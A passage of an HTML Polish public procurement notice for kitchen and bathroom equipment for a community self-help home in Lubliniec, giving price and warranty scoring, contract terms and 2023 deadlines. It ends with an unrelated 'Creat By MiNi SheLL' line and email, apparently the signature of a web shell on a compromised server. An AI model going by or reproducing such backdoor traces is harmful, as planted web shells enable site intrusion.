pkt.<br/>b)	wykonawca, który pozostanie przy minimalnym 30-miesięcznym okresie gwarancji otrzyma 20 pkt.<br/>c)	wykonawca, który zadeklaruje 36-miesięczny okres gwarancji otrzyma 40 pkt.<br/><br/>Kryterium „Okres gwarancji”, będzie rozpatrywany na podstawie oświadczenia wykonawcy złożonego w pkt 8.1 Formularza ofertowego (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, <br/>ZADANIA NR IV, ZADANIA NR V).<br/><br/>UWAGA:<br/>Brak wskazania w ofercie jakiegokolwiek okresu gwarancji, wskazanie innego okres gwarancji niż 24, 30 lub 36 miesięcy, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę minimalnego okresu gwarancji, tj. 24-miesięcy.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/><br/>P = wartość punktowa (Cena – P1) + wartość punktowa (Okres gwarancji – P2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10, realizowana w ramach zadania:<br/><br/>ZADANIE NR IV - WYPOSAŻENIE KUCHNI<br/><br/>2)	Szczegółowy opis i zakres przedmiotu zamówienia (dla ZADANIA NR IV) określa załącznik nr 2 do SWZ.<br/><br/>3)	Zaoferowany przez wykonawcę sprzęt, który wymaga podłączenia do instalacji elektrycznej lub sanitarnej powinien być zgodny z zaprojektowaną w powiatowym Środowiskowym Domu Samopomocy instalacją elektryczną i sanitarną udostępnioną w załącznikach:<br/>a)	Projekt techniczny instalacji elektrycznej – załącznik nr 7 do SWZ<br/>b)	Projekt techniczny instalacji sanitarnej – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39700000-9 - Sprzęt gospodarstwa domowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42513200-7 - Urządzenia chłodnicze</p> <p class="mb-0">39200000-4 - Wyposażenie domowe</p> <p class="mb-0">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</p> <p class="mb-0">44410000-7 - Artykuły łazienkowe i kuchenne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-06</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V<br/><br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Waga (%)<br/><br/>1) Cena (P1)	60 %<br/><br/>2)	Okres gwarancji (P2)	40 %<br/>	<br/>Razem (P)	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej. <br/><br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 60,00 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/>Wartość punktowa =----------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto) <br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbą punktów (100 pkt). Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Okres gwarancji” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Waga - 40%<br/><br/>Zamawiający ustala minimalny 24-miesięczny okres gwarancji.<br/> <br/>Dla kryterium ,, Okres gwarancji” (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) punkty zostaną przyznane w następujący sposób:<br/>a)	wykonawca, który pozostanie przy minimalnym 24-miesięcznym okresie gwarancji otrzyma 0 pkt.<br/>b)	wykonawca, który pozostanie przy minimalnym 30-miesięcznym okresie gwarancji otrzyma 20 pkt.<br/>c)	wykonawca, który zadeklaruje 36-miesięczny okres gwarancji otrzyma 40 pkt.<br/><br/>Kryterium „Okres gwarancji”, będzie rozpatrywany na podstawie oświadczenia wykonawcy złożonego w pkt 8.1 Formularza ofertowego (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, <br/>ZADANIA NR IV, ZADANIA NR V).<br/><br/>UWAGA:<br/>Brak wskazania w ofercie jakiegokolwiek okresu gwarancji, wskazanie innego okres gwarancji niż 24, 30 lub 36 miesięcy, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę minimalnego okresu gwarancji, tj. 24-miesięcy.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/><br/>P = wartość punktowa (Cena – P1) + wartość punktowa (Okres gwarancji – P2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10, realizowana w ramach zadania:<br/><br/>ZADANIE NR V - WYPOSAŻENIE ŁAZIENKI<br/><br/>2)	Szczegółowy opis i zakres przedmiotu zamówienia (dla ZADANIA NR V) określa załącznik nr 2 do SWZ.<br/><br/>3)	Zaoferowany przez wykonawcę sprzęt, który wymaga podłączenia do instalacji elektrycznej lub sanitarnej powinien być zgodny z zaprojektowaną w powiatowym Środowiskowym Domu Samopomocy instalacją elektryczną i sanitarną udostępnioną w załącznikach:<br/>a)	Projekt techniczny instalacji elektrycznej – załącznik nr 7 do SWZ<br/>b)	Projekt techniczny instalacji sanitarnej – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44410000-7 - Artykuły łazienkowe i kuchenne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39713211-5 - Urządzenia do suszenia i prasowania</p> <p class="mb-0">39713500-8 - Żelazka elektryczne</p> <p class="mb-0">42716120-5 - Pralki</p> <p class="mb-0">42716200-0 - Suszarki</p> <p class="mb-0">39712210-1 - Suszarki do włosów</p> <p class="mb-0">42514000-2 - Maszyny i aparatura do filtrowania lub oczyszczania gazów</p> <p class="mb-0">39713430-6 - Odkurzacze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-06</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V<br/><br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Waga (%)<br/><br/>1) Cena (P1)	60 %<br/><br/>2)	Okres gwarancji (P2)	40 %<br/>	<br/>Razem (P)	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej. <br/><br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 60,00 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/>Wartość punktowa =----------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto) <br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbą punktów (100 pkt). Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Okres gwarancji” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Waga - 40%<br/><br/>Zamawiający ustala minimalny 24-miesięczny okres gwarancji.<br/> <br/>Dla kryterium ,, Okres gwarancji” (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) punkty zostaną przyznane w następujący sposób:<br/>a)	wykonawca, który pozostanie przy minimalnym 24-miesięcznym okresie gwarancji otrzyma 0 pkt.<br/>b)	wykonawca, który pozostanie przy minimalnym 30-miesięcznym okresie gwarancji otrzyma 20 pkt.<br/>c)	wykonawca, który zadeklaruje 36-miesięczny okres gwarancji otrzyma 40 pkt.<br/><br/>Kryterium „Okres gwarancji”, będzie rozpatrywany na podstawie oświadczenia wykonawcy złożonego w pkt 8.1 Formularza ofertowego (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, <br/>ZADANIA NR IV, ZADANIA NR V).<br/><br/>UWAGA:<br/>Brak wskazania w ofercie jakiegokolwiek okresu gwarancji, wskazanie innego okres gwarancji niż 24, 30 lub 36 miesięcy, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę minimalnego okresu gwarancji, tj. 24-miesięcy.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/><br/>P = wartość punktowa (Cena – P1) + wartość punktowa (Okres gwarancji – P2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z postanowieniami SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z postanowieniami SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami paragrafu 10 projektu umowy (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) - załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzlubliniec.e-zp.finn.pl/procurements</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ZADANIE NR I<br/>Zamawiający wymaga, aby zamówienie zostało wykonane w nieprzekraczalnym terminie do dnia <br/>06 grudnia 2023r. z zastrzeżeniem, że miejsce wykonania zamówienia zostanie udostępnione wykonawcy po 27 listopada 2023r.<br/><br/>ZADANIE NR II<br/>Zamawiający wymaga, aby zamówienie zostało wykonane w nieprzekraczalnym terminie do dnia <br/>06 grudnia 2023r. z zastrzeżeniem, że miejsce wykonania zamówienia zostanie udostępnione wykonawcy po 27 listopada 2023r.<br/><br/>ZADANIE NR III<br/>Zamawiający wymaga, aby zamówienie zostało wykonane w nieprzekraczalnym terminie do dnia <br/>06 grudnia 2023r. z zastrzeżeniem, że miejsce wykonania zamówienia zostanie udostępnione wykonawcy po 27 listopada 2023r.<br/><br/>ZADANIE NR IV<br/>Zamawiający wymaga, aby zamówienie zostało wykonane w nieprzekraczalnym terminie do dnia <br/>06 grudnia 2023r. z zastrzeżeniem, że miejsce wykonania zamówienia zostanie udostępnione wykonawcy po 27 listopada 2023r.<br/><br/>ZADANIE NR V<br/>Zamawiający wymaga, aby zamówienie zostało wykonane w nieprzekraczalnym terminie do dnia <br/>06 grudnia 2023r. z zastrzeżeniem, że miejsce wykonania zamówienia zostanie udostępnione wykonawcy po 27 listopada 2023r.

Creat By MiNi SheLL
Email: jattceo@gmail.com